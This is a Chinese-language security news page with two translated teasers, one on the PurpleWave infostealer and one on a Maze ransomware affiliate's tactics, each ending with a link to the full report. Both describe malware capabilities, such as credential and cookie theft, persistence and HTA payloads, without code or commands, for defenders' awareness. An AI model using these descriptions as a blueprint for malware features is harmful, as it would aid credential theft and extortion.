Infostealer是网络犯罪分子最赚钱的工具之一,因为从感染了该恶意软件的系统收集的信息可以在地下网络犯罪分子中出售或用于凭据填充攻击。Zscaler ThreatLabZ团队遇到了一个名为PurpleWave的新Infostealer,它是用C ++编写的,并自动将其静默安装到用户的系统上。它连接到命令和控制(C&C)服务器以发送系统信息,并将新的恶意软件安装到受感染的系统上。 该恶意软件的作者在俄罗斯网络犯罪论坛上销售PurpleWave,终身更新的费用为5,000 RUB(US 54)。 图1:俄罗斯论坛上的PurpleWave销售帖子出售PurpleWave的作者声称,这种窃取程序能够窃取Chromium和Mozilla浏览器的密码,cookie,卡以及自动填充形式。该窃取程序还会从指定路径中收集文件,进行屏幕截图并安装其他模块。     … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1298/ 消息与封面来源:zscaler,译者:叶绿体 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。  

人为操控攻击的 Maze 勒索软件

摘要 Maze勒索软件是目前在野外使用最广泛的勒索软件之一,由具有能力的参与者进行分发。 我们发现了一个Maze分支机构,在交付勒索软件之前部署了量身定制的持久性方法。 行动者似乎使用了被盗的证书在其信标上签名。 与其他攻击一样,行动者使用HTA有效载荷作为交互式外壳,能够捕获到实时的和去模糊化的内容。 背景 Maze勒索软件在过去的大约一年时间里被广泛使用,成为全世界许多不同参与者的最终有效载荷。今年,臭名昭著的Maze运营商不仅开始通过加密文件勒索公司,而且威胁会在线发布被窃取的文件,从而勒索公司。最近,我们抓住了一个Maze会员,该会员尝试通过借由我们客户的网络进行传播。 在这篇文章中,我们分享有关该Maze会员使用方法的详细信息,以阐明他们的策略并帮助安全团队在其自己的网络中寻找类似的IOC。   … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1294/ 消息与封面来源:SentinelLABS,译者:叶绿体 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。